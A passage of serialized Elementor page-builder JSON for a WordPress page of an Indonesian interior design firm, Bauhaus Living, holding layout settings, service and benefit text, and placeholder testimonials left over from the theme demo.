"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Berikut alasan banyak yang memilih Bauhaus\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{